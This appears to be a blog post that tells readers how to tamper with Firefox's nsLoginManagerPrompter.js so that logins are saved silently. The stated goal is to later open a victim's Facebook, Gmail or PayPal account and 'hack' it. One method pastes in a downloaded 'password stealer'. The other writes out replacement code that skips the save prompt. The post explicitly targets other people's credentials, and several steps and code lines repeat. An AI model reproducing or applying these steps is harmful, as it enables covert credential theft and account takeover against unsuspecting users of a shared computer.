Hello Guys,Today I am gonna tell you how to make Mozila Firefox Browser as auto save by which when a person Enter any ID and password then it automatic save without any information to Logger. It also save website address by which when you watch then you directly go to website(like FB,Gmail,Paypal etc) and Enter ID ,Password and Hack the person’s account.
First, I searched some of the important keywords such as “Never for This Site” and “Not Now” on all the files and found that this function is controlled by a few javascript .js files. Then I was more confident in getting this to work since I didn’t have to go through the trouble of downloading the Firefox source code, modify and compile it.
There are two method you can do this .
Method 1
Step 1.Download HackMantra MF Password stealer here.After download it plz open it with wordpad.
Step 2.Go to Your Windows Drive(In my case C drive) and follow below path…
Step 3.C:Program FilesMozilla Firefoxcomponents
Step 4.Here Search a file
nsLoginManagerPrompter.js
Step 5.Open it with notepad and use ‘ctrl+A’ for select all write data and replace by my downloaded stealer data and save it by ‘Shift+S’ button.
Method 2
Step 1.Open a text editor (my favorite is Notepad++, you can download it here)
Step 2.Open the file nsLoginManagerPrompter.js, located in the components folder of your Firefox main directory (for example, default location should be C:Program FilesMozilla Firefoxcomponents)
Step 2.Open the file nsLoginManagerPrompter.js, located in the components folder of your Firefox main directory (for example, default location should be C:Program FilesMozilla Firefoxcomponents)
Step 3.Go to the _showSaveLoginNotification function and remove everything between lines 642 to 711, or until you find the _removeLoginNotifications funtion, if you’re going to use the Search feature instead of checking the line number…
Step 4.Replace that section with these two lines of code:
var pwmgr = this._pwmgr;
pwmgr.addLogin(aLogin);
var pwmgr = this._pwmgr;
pwmgr.addLogin(aLogin);
Step 5.Save the file and open Firefox.
That’s all, folks! Now, all your user names and passwords will be saved automatically, so be sure to use this feature carefully… and avoid using Firefox on public computers, since someone else could have done this and turned this notorious browser into some kind of keylogger!
*this will work only with version 3.5.3 or below
*this will work only with version 3.5.3 or below
0 comments:
Post a Comment